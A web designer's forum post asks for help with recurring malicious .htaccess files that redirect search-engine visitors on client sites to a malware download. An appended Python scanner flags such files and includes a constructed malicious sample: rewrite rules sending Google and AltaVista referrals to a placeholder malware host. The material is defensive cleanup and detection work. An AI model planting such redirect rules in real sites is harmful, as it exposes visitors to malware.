I have a Windows XP machine and I posted my request for help on Nutnworks about a week ago. I have AVG Anti-Virus version 9 and I routinely have it update and scan automatically. I sent you the zipped .htaccess file today.
I design web sites and one of my web site owners/clients indicated that when he searched for his site on Google and then clicked on the Google link to his site, a pop-up appears to download a binary DOS file. This also happens when using other search engine sites (AOL, MSN, Alta Vista, etc.). Once you click off the pop-up, it never appears again, and the link correctly goes to the web page listed.
My host checked my account and said there were over 300 malicious .htaccess files they had to remove off the server for all of my client web sites. They recommended that I have my PC scanned for viruses or malware because they suspected the program has all my passwords to FTP web pages. I changed all my server passwords online using another PC.
I worked with Tom K at Nutnworks for a couple of days with 6 software downloads to scan everything and my machine was clean last weekend. However, the .htaccess files have returned to the server even though I changed "all" my passwords. I wrote to the host tech about this and asked him to look at the .htaccess file and he sent the following reply:
"This new .htaccess is indeed malicious - it is redirecting people to the same malware site as before.
It does look like only the .htaccess in the "deco" account is infected. The only accounts on our server that are having this problem are the ones owned underneath your reseller account, so it continues to look like a piece of malware on the computer you are accessing from that is allowing this to happen."
So I wrote Tom K again about it. He asked me to send the file to Grinler for analysis (because I was having problems sending it to Little Eagle at Nutnworks, getting a server error) and that's where I stand at this time.
After writing Grinler today I manually went into my 22 client accounts and removed about 60 or so .htaccess files (all the malicious files, 4k large); however, I did not remove those that I created to access certain secure directories. At this point all my client accounts are clean. I'm just not sure if I have "anything" on my machine that could cause the files to re-appear. Most of the .htaccess files were dated 10/20/10; however, they were all removed by my host just last Friday and I changed all my passwords right after they confirmed they were deleted.
Tom gave me several links referring to the .htaccess files:
A link to a guy who has written a .PHP script to help with cleaning it off: http://alvinjiang.blogspot.com/2010/...to-remove.html
A link to a blog from a lady who had the issue:
Tom said if I do a Google search on "exgocgkctswo", I would be able to find many other site designers that have been hit like myself. For example, this gal has posted the identical code: http://forum.joomla.org/viewtopic.php?p=2260567 You may also notice that this .htaccess code will come up on the search engine for a variety of sites (nascar, real estate, etc.), which leads me to believe that their sites are currently infiltrated with this garbage.
Is there anything you can do to suggest how I can keep this from happening again, other than changing my passwords periodically? Is there a program I can use to scan my sites to ensure everything is gone?
Thank you in advance!
Edited by Gutsy, 04 November 2010 - 07:11 PM.
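
A scan of the kind asked about in the post above, as an added example that is not part of the original post or of any reply: it walks a local mirror of a site and flags .htaccess files that pair a search-engine referrer condition with a redirect to an outside host, while leaving password-protection files alone. It assumes the redirect is done with `RewriteCond %{HTTP_REFERER}` rules, which matches the symptom described; the sample contents, the host `malware-host.example` and the yahoo/bing entries are constructed, since the actual file is not shown on the page.

```python
import os
import re

# Assumed shape of the infection: a rewrite condition keyed on the Referer header...
REFERER_COND = re.compile(r'^\s*RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)', re.I)
# ...followed by a rewrite/redirect whose target is an absolute URL (host captured).
EXTERNAL_RULE = re.compile(
    r'^\s*(?:RewriteRule|Redirect(?:Match)?)\s.*?https?://([^/\s"\']+)', re.I)
# Engines named in the post, plus yahoo and bing (assumption).
SEARCH_ENGINES = ("google", "aol", "msn", "altavista", "yahoo", "bing")

# Constructed samples, not the file from the post: a password-protection
# .htaccess and a referrer-conditional redirect to a placeholder host.
SAMPLE_AUTH = 'AuthType Basic\nAuthUserFile /home/site/.htpasswd\nRequire valid-user\n'
SAMPLE_BAD = ('RewriteEngine On\n'
              'RewriteCond %{HTTP_REFERER} .*google.* [OR]\n'
              'RewriteCond %{HTTP_REFERER} .*altavista.* [NC]\n'
              'RewriteRule ^(.*)$ http://malware-host.example/in.php [R=301,L]\n')

def inspect_htaccess(text, own_hosts=()):
    """Return reasons the content looks like a search-referrer redirect.
    own_hosts: lowercase hostnames the site legitimately redirects to."""
    referer_hits, external_hosts = [], []
    for line in text.splitlines():
        if line.lstrip().startswith("#"):   # ignore commented-out directives
            continue
        m = REFERER_COND.match(line)
        if m and any(s in m.group(1).lower() for s in SEARCH_ENGINES):
            referer_hits.append(m.group(1))
        m = EXTERNAL_RULE.match(line)
        if m and m.group(1).lower() not in own_hosts:
            external_hosts.append(m.group(1).lower())
    if referer_hits and external_hosts:     # both halves must be present
        return ["search-engine referrer condition + redirect to " + h
                for h in sorted(set(external_hosts))]
    return []

def scan_tree(root, own_hosts=()):
    """Walk a local mirror; map each flagged .htaccess path to its reasons."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        if ".htaccess" in files:
            path = os.path.join(dirpath, ".htaccess")
            with open(path, "r", errors="replace") as fh:
                reasons = inspect_htaccess(fh.read(), own_hosts)
            if reasons:
                findings[path] = reasons
    return findings

if __name__ == "__main__":
    print(inspect_htaccess(SAMPLE_BAD), inspect_htaccess(SAMPLE_AUTH))
```

Run `scan_tree` against a fresh download of each account and review every flagged file by hand before deleting it; an empty result only means no file matched this one pattern.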